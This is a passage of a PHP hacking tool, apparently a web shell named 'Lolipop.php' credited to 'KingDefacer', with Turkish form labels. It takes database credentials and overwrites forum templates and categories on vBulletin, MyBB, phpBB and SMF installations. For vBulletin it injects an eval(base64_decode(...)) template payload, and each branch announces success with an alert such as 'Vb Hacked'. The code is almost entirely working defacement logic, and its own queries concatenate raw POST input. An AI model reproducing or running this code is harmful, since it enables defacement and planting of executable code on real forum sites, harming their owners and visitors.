148 | $index=str_replace("\'","'",$index); 
149 | $set_index  = "{\${eval(base64_decode(\'"; 
150 | 
151 | $set_index .= base64_encode("echo \"$index\";"); 
152 | 
153 | 
154 | $set_index .= "\'))}}{\${exit()}}</textarea>"; 
155 | 
156 | 
157 | if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) 
158 | { 
159 | mysql_connect($dbh,$dbu,$dbp) or die(mysql_error()); 
160 | mysql_select_db($dbn) or die(mysql_error()); 
161 | $loli1 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='spacer_open'"; 
162 | $loli2 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='FORUMHOME'"; 
163 | $loli3 = "UPDATE style SET css='".$set_index."".$KingDefacer."', stylevars='', csscolors='', editorstyles=''"; 
164 | $result = mysql_query($loli1) or die (mysql_error()); 
165 | $result = mysql_query($loli2) or die (mysql_error()); 
166 | $result = mysql_query($loli3) or die (mysql_error()); 
167 | echo "<script>alert('Vb Hacked');</script>"; 
168 | } 
169 | 
170 | //MyBB Hack 
171 | if (isset($_POST['mybulletin'])) 
172 | { 
173 | echo "<center><table border=0 width='100%'> 
174 | <tr><td> 
175 | <center><font face='Arial' color='#000000'>==Lolipop MyBB index.==</font></center> 
176 |     <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=mybbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
177 |           <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=mybbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
178 |           <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=mybbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
179 |           <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=mybbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
180 |           <font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=mybbindex rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br> 
181 |           <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>"; 
182 | die(); 
183 | } 
184 | $mybb_dbh = $_POST['mybbdbh']; 
185 | $mybb_dbu = $_POST['mybbdbu']; 
186 | $mybb_dbn = $_POST['mybbdbn']; 
187 | $mybb_dbp = $_POST['mybbdbp']; 
188 | $mybb_index = $_POST['mybbindex']; 
189 | 
190 | if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index)) 
191 | { 
192 | mysql_connect($mybb_dbh,$mybb_dbu,$mybb_dbp) or die(mysql_error()); 
193 | mysql_select_db($mybb_dbn) or die(mysql_error()); 
194 | $prefix="mybb_"; 
195 | $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'"; 
196 | 
197 | $result = mysql_query($loli7) or die (mysql_error()); 
198 | 
199 | echo "<script>alert('MyBB Hacked');</script>"; 
200 | } 
201 | //PhpBB 
202 | if (isset($_POST['phpbb'])) 
203 | { 
204 | echo "<center><table border=0 width='100%'> 
205 | <tr><td> 
206 | <center><font face='Arial' color='#000000'>==Lolipop PHPBB index.==</font></center> 
207 |     <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=phpbbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
208 |           <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=phpbbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
209 |           <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=phpbbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
210 |           <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=phpbbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
211 |           <font face='Arial' color='#000000'>Yazi Veya  KOD<br></font><input type=text name=phpbbkat size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
212 |           <font face='Arial' color='#000000'>Degisecek KATEGORI ID si<br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
213 |           <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>"; 
214 | die(); 
215 | } 
216 | $phpbb_dbh = $_POST['phpbbdbh']; 
217 | $phpbb_dbu = $_POST['phpbbdbu']; 
218 | $phpbb_dbn = $_POST['phpbbdbn']; 
219 | $phpbb_dbp = $_POST['phpbbdbp']; 
220 | $phpbb_kat = $_POST['phpbbkat']; 
221 | $kategoriid=$_POST['katid']; 
222 | 
223 | if (!empty($phpbb_dbh) && !empty($phpbb_dbu) && !empty($phpbb_dbn) && !empty($phpbb_kat)) 
224 | { 
225 | mysql_connect($phpbb_dbh,$phpbb_dbu,$phpbb_dbp) or die(mysql_error()); 
226 | mysql_select_db($phpbb_dbn) or die(mysql_error()); 
227 | 
228 | 
229 | $loli10 = "UPDATE phpbb_categories  SET cat_title='".$phpbb_kat."' WHERE cat_id='".$kategoriid."'"; 
230 | 
231 | $result = mysql_query($loli10) or die (mysql_error()); 
232 | 
233 | echo "<script>alert('PhpBB Hacked');</script>"; 
234 | } 
235 | //SmfHACK 
236 | if (isset($_POST['smf'])) 
237 | { 
238 | echo "<center><table border=0 width='100%'> 
239 | <tr><td> 
240 | <center><font face='Arial' color='#000000'>==Lolipop SMF Index.==</font></center> 
241 |     <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=smfdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
242 |           <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=smfdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
243 |           <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=smfdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
244 |           <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=smfdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
245 |                     <font face='Arial' color='#000000'>Yazi Yada KOD<br></font><input type=text name=smf_index size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
246 |                     <font face='Arial' color='#000000'>Degisecek KATEGORI ID si <br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> 
247 | 
248 |           <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>"; 
249 | die(); 
250 | } 
251 | $smf_dbh = $_POST['smfdbh']; 
252 | $smf_dbu = $_POST['smfdbu']; 
253 | $smf_dbn = $_POST['smfdbn']; 
254 | $smf_dbp = $_POST['smfdbp']; 
255 | $smf_index = $_POST['smf_index']; 
256 | $smf_katid=$_POST['katid']; 
257 | 
258 | if (!empty($smf_dbh) && !empty($smf_dbu) && !empty($smf_dbn) && !empty($smf_index)) 
259 | { 
260 | mysql_connect($smf_dbh,$smf_dbu,$smf_dbp) or die(mysql_error()); 
261 | mysql_select_db($smf_dbn) or die(mysql_error()); 
262 | $prefix="smf_"; 
263 | $loli12 = "UPDATE ".$prefix."categories SET name='".$smf_index."' WHERE ID_CAT='".$smf_katid."'"; 
264 | 
265 | $result = mysql_query($loli12) or die (mysql_error()); 
266 | 
267 | echo "<script>alert('smf Hacked');</script>"; 
268 | } 
269 | 
270 | 
271 | //Alt taraf 
272 | echo " 
273 | 
274 | 
275 | <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> 
276 | <tr> 
277 | <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> 
278 | 
279 |   <p><strong>Lolipop.php</strong></p> 
280 |   <p><strong>Edited By KingDefacer</strong></p> 
281 | <p><strong></strong><br> 
282 | </p></td> 
283 | </tr></table>"; 
284 | 
285 | 
286 | 
287 | // Kod bitisi 
288 | ?> 
289 | 


--------------------------------------------------------------------------------